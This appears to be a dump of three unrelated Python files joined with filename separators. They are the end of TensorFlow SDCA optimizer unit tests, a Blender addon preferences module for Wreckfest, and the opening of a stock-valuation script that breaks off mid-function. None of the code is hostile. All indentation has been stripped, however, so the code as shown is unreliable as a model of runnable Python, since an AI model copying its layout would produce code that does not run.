tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, num_shards)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(0, 0)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(tf.errors.InvalidArgumentError, 'indices.*'):
train_op.run()
def testOutOfRangeDenseFeatures(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[1.0, 0.0])
# Replace with a variable of size 1 instead of 2.
variables['dense_features_weights'] = [
tf.compat.v1.Variable(tf.zeros([1], dtype=tf.dtypes.float32))
]
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
'More dense features than we have parameters for.*'):
train_op.run()
def testMissingFeature(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
make_example_proto({
'age': [],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=1,
loss_type='logistic_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
unregularized_loss = lr.unregularized_loss(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
# TODO(katsiaspis): add a test for the case when examples at the end of an
# epoch are repeated, since example id may be duplicated.
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithLinearLossTest(_SDCAModelTest):
"""SDCA optimizer test class for linear (squared) loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 2/3 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2
self.assertAllClose([-20.0 / 3.0, 28.0 / 3.0],
predictions.eval(),
rtol=0.005)
# Approximate gap should be very close to 0.0. (In fact, because the gap
# is only approximate, it is likely that upon convergence the duality gap
# can have a tiny negative value).
self.assertAllClose(0.0, lr.approximate_duality_gap().eval(), atol=1e-2)
def testL2Regularization(self):
# Setup test data
example_protos = [
# 2 identical examples
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
# 2 more identical examples
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=16,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be 1/5 of label due to minimizing regularized loss:
# (label - 2 * weight)^2 + L2 * 16 * weight^2
optimal1 = -10.0 / 5.0
optimal2 = 14.0 / 5.0
self.assertAllClose([optimal1, optimal1, optimal2, optimal2],
predictions.eval(),
rtol=0.01)
def testL1Regularization(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=4.0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
prediction = lr.predictions(examples)
loss = lr.regularized_loss(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# Predictions should be -4, 20/3 due to minimizing regularized loss:
# (label - 2 * weight)^2 / 2 + L2 * 2 * weight^2 + L1 * 4 * weight
self.assertAllClose([-4.0, 20.0 / 3.0], prediction.eval(), rtol=0.08)
# Loss should be the sum of the regularized loss value from above per
# example after plugging in the optimal weights.
self.assertAllClose(308.0 / 6.0, loss.eval(), atol=0.01)
def testFeatureValues(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, -10.0, -2.0),
make_example_proto({
'age': [1],
'gender': [1]
}, 14.0, 2.0),
]
example_weights = [5.0, 3.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There are 4 (sparse) variable weights to be learned. 2 for age and 2 for
# gender. Let w_1, w_2 be age weights, w_3, w_4 be gender weights, y_1,
# y_2 be the labels for examples 1 and 2 respectively and s_1, s_2 the
# corresponding *example* weights. With the given feature values, the loss
# function is given by:
# s_1/2(y_1 + 2w_1 + 2w_3)^2 + s_2/2(y_2 - 2w_2 - 2w_4)^2
# + \lambda/2 (w_1^2 + w_2^2 + w_3^2 + w_4^2). Solving for the optimal, it
# can be verified that:
# w_1* = w_3* = -2.0 s_1 y_1/(\lambda + 8 s_1) and
# w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2). Equivalently, due to
# regularization and example weights, the predictions are within:
# 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the labels.
self.assertAllClose([-10 * 40.0 / 41.0, 14.0 * 24 / 25.0],
predictions.eval(),
atol=0.01)
def testDenseFeaturesWithDefaultWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
weights=[1.0, 1.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2). So,
# differentiating wrt to w_1, w_2 yields the following optimal values:
# w_1* = label_1/(\lambda + 1)= 10/2, w_2* =label_2/(\lambda + 1)= -5/2.
# In this case the (unnormalized regularized) loss will be:
# 1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
# loss should be further normalized by the sum of example weights.
self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)
def testDenseFeaturesWithArbitraryWeights(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
weights=[20.0, 10.0],
labels=[10.0, -5.0])
options = dict(
symmetric_l2_regularization=5.0,
symmetric_l1_regularization=0,
loss_type='squared_loss')
lr = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The loss function for these particular features is given by:
# 1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
# \lambda/2 (w_1^2 + w_2^2) where s_1, s_2 are the *example weights. It
# turns out that the optimal (variable) weights are given by:
# w_1* = label_1 \cdot s_1/(\lambda + s_1)= 8.0 and
# w_2* =label_2 \cdot s_2/(\lambda + s_2)= -10/3.
# In this case the (unnormalized regularized) loss will be:
# s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9. The
# actual loss should be further normalized by the sum of example weights.
self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
loss = lr.regularized_loss(examples)
self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithHingeLossTest(_SDCAModelTest):
"""SDCA optimizer test class for hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and minimizing
# wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This gives 0.0
# unregularized loss and 0.25 L2 loss.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllEqual([-1.0, 1.0], predictions.eval())
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.0, unregularized_loss.eval())
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)
def testDenseFeaturesPerfectlySeparable(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
# (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
# the SVM's functional margin >=1), so the unregularized loss is ~0.0.
# There is only loss due to l2-regularization. For these datapoints, it
# turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesSeparableWithinMargins(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
weights=[1.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
# are within the margins so there is unregularized loss (1/2 per example).
# For these datapoints, optimal weights are w_1~=0.0 and w_2~=1.0 which
# gives an L2 loss of ~0.25.
self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)
def testDenseFeaturesWeightedExamples(self):
with self._single_threaded_test_session():
examples, variables = make_dense_examples_and_variables_dicts(
dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
weights=[3.0, 1.0],
labels=[1.0, 0.0])
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='hinge_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
predictions = model.predictions(examples)
binary_predictions = get_binary_predictions_for_hinge(predictions)
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
# Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
# try to increase the margin from (1.0, 0.5). Due to regularization,
# (1.0, -0.5) will be within the margin. For these points and example
# weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
# loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will be
# correct, but the boundary will be much closer to the 2nd point than the
# first one.
self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
self.assertAllEqual([1, 0], binary_predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithSmoothHingeLossTest(_SDCAModelTest):
"""SDCA optimizer test class for smooth hinge loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='smooth_hinge_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
predictions = model.predictions(examples)
self.assertAllClose([0.0, 0.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# After minimization, the model separates perfectly the data points. There
# are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender (say w3
# and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3. This gives
# an unregularized hinge loss of 0.33 and a 0.11 L2 loss
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
binary_predictions = get_binary_predictions_for_hinge(predictions)
self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
self.assertAllEqual([0, 1], binary_predictions.eval())
self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithPoissonLossTest(_SDCAModelTest):
"""SDCA optimizer test class for poisson loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 2),
]
example_weights = [100.0, 100.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1.0,
symmetric_l1_regularization=0,
loss_type='poisson_loss')
model = _SDCAModel(examples, variables, options)
tf.compat.v1.initializers.global_variables().run()
# Before minimization, the weights default to zero. There is no loss due
# to regularization, only unregularized loss which is 1 for each example.
predictions = model.predictions(examples)
self.assertAllClose([1.0, 1.0], predictions.eval())
unregularized_loss = model.unregularized_loss(examples)
regularized_loss = model.regularized_loss(examples)
approximate_duality_gap = model.approximate_duality_gap()
self.assertAllClose(1.0, unregularized_loss.eval())
self.assertAllClose(1.0, regularized_loss.eval())
# There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
# (say w3 and w4). The minimization leads to:
# w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
# w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
# This gives an unregularized loss of .3167 and .3366 with regularization.
train_op = model.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
model.update_weights(train_op).run()
self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
class SdcaFprintTest(_SDCAModelTest):
"""Tests for the SdcaFprint op.
This is one way of enforcing the platform-agnostic nature of SdcaFprint.
Basically we are checking against exact values and this test could be running
across different platforms. Note that it is fine for expected values to change
in the future, if the implementation of SdcaFprint changes (ie this is *not* a
frozen test).
"""
def testFprint(self):
with self._single_threaded_test_session():
in_data = tf.constant(['abc', 'very looooooong string', 'def'])
out_data = tf.compat.v1.train.sdca_fprint(in_data)
self.assertAllEqual([[4143508125394299908, -6879828354153669051],
[5849691694103072671, -4874542629849009556],
[603227410218889250, 8762207001949257490]],
self.evaluate(out_data))
class _SparseFeatureColumnTest(TensorFlowTestCase):
"""Tests for _SparseFeatureColumn."""
def testBasic(self):
expected_example_indices = [1, 1, 1, 2]
expected_feature_indices = [0, 1, 2, 0]
sfc = _SparseFeatureColumn(expected_example_indices,
expected_feature_indices, None)
self.assertIsInstance(sfc.example_indices, tf.Tensor)
self.assertIsInstance(sfc.feature_indices, tf.Tensor)
self.assertEqual(sfc.feature_values, None)
with self.cached_session():
self.assertAllEqual(expected_example_indices,
self.evaluate(sfc.example_indices))
self.assertAllEqual(expected_feature_indices,
self.evaluate(sfc.feature_indices))
expected_feature_values = [1.0, 2.0, 3.0, 4.0]
sfc = _SparseFeatureColumn([1, 1, 1, 2], [0, 1, 2, 0],
expected_feature_values)
with self.cached_session():
self.assertAllEqual(expected_feature_values,
self.evaluate(sfc.feature_values))
if __name__ == '__main__':
googletest.main()
|
preferences.py | """Addon preferences that are saved inbetween sesions."""
import bpy
import os.path
import subprocess
import threading
from os import path
def preference_save(self, context):
bpy.ops.wm.save_userpref()
class WreckfestPanelContext(bpy.types.PropertyGroup):
"""Properties that can be changed in panel"""
panel_enums: bpy.props.EnumProperty(
items=(
("CUSTOM_PARTS", "Custom Parts", "Manage custom parts", "PRESET", 0),
("EXPORT", "Export", "Export scene tools", "EXPORT", 1),
("SETTINGS", "Addon Settings", "Addon Settings", "PREFERENCES", 3),
),
name="Addon Panels",
)
class WreckfestToolboxAddonPreference(bpy.types.AddonPreferences):
bl_idname = "wreckfest_toolbox"
wreckfest_message_level = [
("VERBOSE", "Verbose", ""),
("WARNING", "Warning", ""),
("ERROR", "Error", "")
]
physical_materials = [("default", "default", "")]
def get_physical_materials(self, context):
if len(self.physical_materials) > 1:
return self.physical_materials
self.physical_materials.clear()
if self.wf_path is None:
self.physical_materials.append(("default", "default", ""))
return self.physical_materials
directory = self.wf_path + "\\data\\scene\\surface\\"
# Check if the default physical material exist
if not path.exists(directory + "default.suse"):
self.physical_materials.append(("default", "default", ""))
return self.physical_materials
# Get all the .SUSE files in the Wreckfest\data\scene\surface folder and generate a list of string from that
counter = 0
for filename in os.listdir(directory):
if filename.endswith(".suse"):
# add the file to the material list
material_name = os.path.splitext(os.path.basename(filename))[0]
material = (material_name, material_name, material_name)
self.physical_materials.append(material)
counter += 1
return self.physical_materials
# Wreckfest path
wf_path: bpy.props.StringProperty(
name="Wreckfest Path",
subtype="DIR_PATH",
default=R"C:\Program Files (x86)\Steam\steamapps\common\Wreckfest",
update=preference_save,
)
# Build assets tool path
wf_build_asset_subpath: bpy.props.StringProperty(
name="Wreckfest Build Asset Path",
default=R"\tools\build_asset.bat"
)
wf_physical_material_list: bpy.props.EnumProperty(
name="Wreckfest Physical Material List",
items=get_physical_materials,
default=None
)
# TODO : Make this update function work
# update=bpy.ops.wftb.set_physical_material()
export_message_level: bpy.props.EnumProperty(
name="Export Message Level",
items=wreckfest_message_level,
)
apply_modifiers: bpy.props.BoolProperty(
name="Apply Modifier",
default=True,
description="Apply modifier to the exported models"
)
auto_split_edge: bpy.props.BoolProperty(
name="Split Edges",
default=True,
description="Add a Split edge modifier for sharp edges (marked) on export"
)
build_after_export: bpy.props.BoolProperty(
name="Build after export",
description="Launch the Build Asset Script in background "
"for the newly exported .bgo3 file once the export is done",
default=True
)
def draw(self, context):
row = self.layout.row(align=True)
row.prop(self, "wf_path")
@staticmethod
def popen_and_call(on_exit, popen_args):
"""
Runs the given args in a subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and popen_args is a list/tuple of args that
would give to subprocess.Popen.
"""
def run_in_thread(on_exit_event, popen_args_list):
proc = subprocess.Popen(popen_args_list, shell=True)
proc.wait()
on_exit_event()
return
thread = threading.Thread(target=run_in_thread, args=(on_exit, popen_args))
thread.start()
# returns immediately after the thread starts
return thread
|
us_run.py | # -*- coding: utf-8 -*-
import os
import pandas as pd
import re
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import COMMASPACE, formatdate
import csv
from datetime import datetime
import time
import sys
from multiprocessing import Process
import url_handler
import data_collector
import valuator
now = datetime.now()
expected_income_ratio = 8.12
stock_code_file = "./ual.csv" # Test data
columnlist = ['code', 'name', 'price', 'EV/CF', 'EPS', 'PBR', 'dividend', 'ROE%', 'ROA(8)%', 'ROIC(8)%', 'FCFA(8)%', 'P_MM', 'EBIT/EV', 'GPA', 'ROIC%', 'S-RIM\nprice', 'S-RIM\nmargin', 'Templeton\nprice', 'Templeton\nrank', 'P_FS', 'STA', 'SNOA', 'Moat']
def us_run(us_codes, proc_num, list_chunk = 300, login_id="", login_passwd="", result_file_header = "./result_data/us_choosen_"):
print ("proc_num = {}".format(proc_num))
try:
os.makedirs("./itooza/us/"+now.strftime("%Y%m%d")+"/")
print("Directory ", "./itooza/us/"+now.strftime("%Y%m%d")+"/", " Created ")
except FileExistsError:
print("Directory ", "./itooza/us/"+now.strftime("%Y%m%d")+"/", " Already exists")
stock_code_name_dict = {}
s_rim_buy = []
templeton_buy = []
alldfcontents = []
dfcontents = []
all_revisit_contents = []
revisit_contents = []
for us_code in us_codes:
try:
stock_code = us_code[0]
stock_code_name_dict[us_code[0]] = us_code[1]
print("\n\n\nus_code = {}, stock_name = {}".format(stock_code, us_code[1]))
s_rim_price = 0
templeton_price = 0
df_investing, df_financial, current_price, ev = data_collector.read_data_from_itooza_us(stock_code, login_id, login_passwd)
print(df_investing)
print(df_financial)
ev_cf_ratio = valuator.calculate_ev_cf_ratio(ev, df_financial)
print ("EV/CashFlow = {}".format(ev_cf_ratio))
sta, snoa = valuator.calculate_sta_snoa_probm_us(df_financial)
stock_name_to_print = "{}, {}".format(stock_code, stock_code_name_dict[stock_code])
# Get S-RIM Price
s_rim_price = valuator.s_rim_calculator_us(df_investing, expected_income_ratio, current_price)
if s_rim_price > current_price:
print ("S-RIM: BUY {}".format(stock_name_to_print))
s_rim_buy.append((stock_code, int(s_rim_price)))
else:
print ("S-RIM: DON'T BUY {}".format(stock_name_to_print))
# Get Templeton Price
templeton_price = valuator.templeton_price_calculator_us(df_investing)
if templeton_price > current_price:
print ("Templeton: Strong BUY {}".format(stock_name_to_print))
templeton_buy.append((stock_code, int(templeton_price)))
elif (templeton_price * 2) > current_price:
print ("Templeton: Consider BUY {}".format(stock_name_to_print))
templeton_buy.append((stock_code, int(templeton_price)))
else:
print ("Templeton: DON'T BUY {}".format(stock_name_to_print))
fs_score = valuator.calculate_fs_score_us(df_investing, df_financial)
if fs_score >= 7:
print ("FS score: GOOD {}".format(stock_name_to_print))
p_fs = fs_score/10
moat = valuator.is_economic_moat_us(df_investing, df_financial)
ebit_ev = valuator.get_ebit_ev_us(df_financial, ev)
gpa = valuator.get_gpa_us(df_financial)
roic = float(df_investing.loc[20][1].replace('%',''))
roa_8, roic_8, fcfa_8, p_mm = valuator.calc_economic_moat_us(df_investing, df_financial)
# Save data
df_investing.to_csv("./itooza/us/"+now.strftime("%Y%m%d")+"/"+stock_code+"_investing.csv", mode="w")
df_financial.to_csv("./itooza/us/"+now.strftime("%Y%m%d")+"/"+stock_code+"_financial.csv", mode="w")
dfcontents.append(stock_code)
dfcontents.append(stock_code_name_dict[stock_code])
dfcontents.append("{:.2f}".format(current_price))
dfcontents.append("{:.2f}".format(ev_cf_ratio)) # EV/CashFlow
dfcontents.append(df_investing.loc[1][1]) # EPS Consolidated
dfcontents.append(df_investing.loc[8][1]) # PBR
dfcontents.append(df_investing.loc[3][1]) # dividend
dfcontents.append(df_investing.loc[18][1]) # ROE
dfcontents.append("{:.2f}".format(roa_8*100)) # ROA(8)
